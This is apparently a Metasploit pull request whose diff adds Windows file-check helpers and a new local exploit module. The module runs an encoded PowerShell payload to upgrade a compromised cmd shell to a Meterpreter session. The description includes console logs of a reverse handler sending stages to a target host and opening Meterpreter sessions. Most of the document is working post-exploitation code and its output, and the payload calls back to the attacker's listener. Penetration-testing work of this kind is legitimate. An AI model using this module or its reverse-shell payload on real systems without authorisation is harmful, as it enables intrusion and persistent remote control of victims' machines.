### PR TITLE
Windows Shell - Powershell Upgrade

### DIFF
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -41,13 +41,14 @@ module Msf::Post::File
       return stat.directory?
     else
       if session.platform =~ /win/
-        # XXX
+        f = cmd_exec("cmd.exe /C IF exist \"#{path}\\*\" ( echo true )")
       else
         f = session.shell_command_token("test -d '#{path}' && echo true")
-        return false if f.nil? or f.empty?
-        return false unless f =~ /true/
-        return true
       end
+
+      return false if f.nil? or f.empty?
+      return false unless f =~ /true/
+      return true
     end
   end
 
@@ -72,13 +73,17 @@ module Msf::Post::File
       return stat.file?
     else
       if session.platform =~ /win/
-        # XXX
+        f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
+        if f =~ /true/
+          f = cmd_exec("cmd.exe /C IF exist \"#{path}\\\\\" ( echo false ) ELSE ( echo true )")
+        end
       else
         f = session.shell_command_token("test -f '#{path}' && echo true")
-        return false if f.nil? or f.empty?
-        return false unless f =~ /true/
-        return true
       end
+
+      return false if f.nil? or f.empty?
+      return false unless f =~ /true/
+      return true
     end
   end
 
@@ -93,13 +98,14 @@ module Msf::Post::File
       return !!(stat)
     else
       if session.platform =~ /win/
-        # XXX
+         f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
       else
         f = session.shell_command_token("test -e '#{path}' && echo true")
-        return false if f.nil? or f.empty?
-        return false unless f =~ /true/
-        return true
       end
+
+      return false if f.nil? or f.empty?
+      return false unless f =~ /true/
+      return true
     end
   end
 

--- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb
+++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Command Shell Upgrade (Powershell)',
+        'Description'   => %q{
+          This module executes Powershell to upgrade a Windows Shell session
+          to a full Meterpreter session.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
+          ],
+        'DefaultOptions' =>
+            {
+                'WfsDelay'     => 10,
+            },
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'shell' ],
+        'Targets' => [ [ 'Universal', {} ] ],
+        'DefaultTarget' => 0
+      ))
+  end
+
+  def exploit
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+
+    if file? "%WINDIR%\\System32#{psh_path}"
+      print_status("Executing powershell command line...")
+      cmd_exec(cmd_psh_payload(payload.encoded))
+    else
+      fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
+    end
+  end
+
+end
+


### PR DESCRIPTION
This uses Powershell to upgrade a shell session to Meterpreter. I was going to integrate it into session -u but that would mean modifying the script somewhat so I have saved that for a later job...

I have also implemented some missing Windows shell commands. These have to be run via cmd.exe because if `IF blah` evaluated to false the `&echo token` wouldn't occur. As the & is compared to the success of cmd.exe it does get appended so the shell_token command works.

I haven't made this x64 safe because my other Powershell PR does auto Architecture checking. It doesn't currently work on a meterpreter session (handy if you want to spawn a duplicate shell?) because it doesn't expand_path. Again this should be easier to do when my other PR lands...

```
[*] Sending encoded stage (267 bytes) to 192.168.1.27
[*] Command shell session 4 opened (192.168.1.100:8888 -> 192.168.1.27:49174) at 2014-02-02 19:10:24 +0000
msf exploit(powershell_cmd_upgrade) > set SESSION 4
msf exploit(powershell_cmd_upgrade) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.100:4444 
[*] Executing powershell command line...
[*] Sending stage (769024 bytes) to 192.168.1.27
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.27:49175) at 2014-02-02 19:11:09 +0000
```
